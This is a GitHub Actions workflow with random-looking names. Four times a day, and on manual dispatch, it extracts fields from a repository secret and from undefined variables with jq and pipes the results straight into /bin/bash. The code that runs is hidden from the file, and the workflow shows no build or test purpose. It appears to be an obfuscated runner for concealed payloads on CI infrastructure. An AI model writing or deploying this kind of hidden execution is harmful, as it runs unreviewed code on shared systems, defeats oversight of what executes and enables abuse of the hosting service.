name: drawingmisnomer

on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: drawingmisnomer
        env:
          vcvn49: ${{ secrets.vcvn49 }}
        run: |
          echo $vcvn49 | jq -r .f08 | /bin/bash
          echo $cpy376 | jq -r .fxnhl69760 | /bin/bash
          echo $sz7 | jq -r .n93232 | /bin/bash
          echo $qf167 | jq -r .i85 | /bin/bash
          echo $xirt3428 | jq -r .hptbt187 | /bin/bash
          echo $m47526 | jq -r .a954 | /bin/bash

